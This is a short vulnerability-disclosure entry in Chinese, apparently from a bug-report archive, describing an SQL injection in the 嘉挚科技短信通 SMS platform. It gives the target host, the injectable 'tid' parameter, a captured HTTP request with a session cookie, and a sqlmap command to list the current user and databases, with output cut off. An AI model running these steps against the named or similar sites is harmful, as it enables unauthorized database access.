嘉挚科技短信通sql注入

- AV AC AU C I A
发布: 2025-04-13
修订: 2025-04-13

### 简要描述: rt ### 详细说明: ``` http://sms.finereason.com/ ``` 首先注册一个用户,登陆。然后在 ``` http://sms.finereason.com/member/ComSms.asp?tid=1 ``` 存在在注入。用burp抓包,然后保存。 ``` GET /member/ComSms.asp?tid=1* HTTP/1.1 Host: sms.finereason.com Proxy-Connection: keep-alive Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.94 Safari/537.36 Accept-Encoding: gzip, deflate, sdch Accept-Language: zh-CN,zh;q=0.8 Cookie: ASPSESSIONIDACQQQBBQ=LCCGAAPCOOIFOPAABCCAEHHF ``` ``` [root@Hacker~]# Sqlmap -r "C:\Users\A\Desktop\3.txt" --delay=2 --current-us er --dbs sqlmap/1.0-dev - automatic SQL injection and database takeover tool http://sqlmap.org [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not respon...

0%
暂无可用Exp或PoC
当前有0条受影响产品信息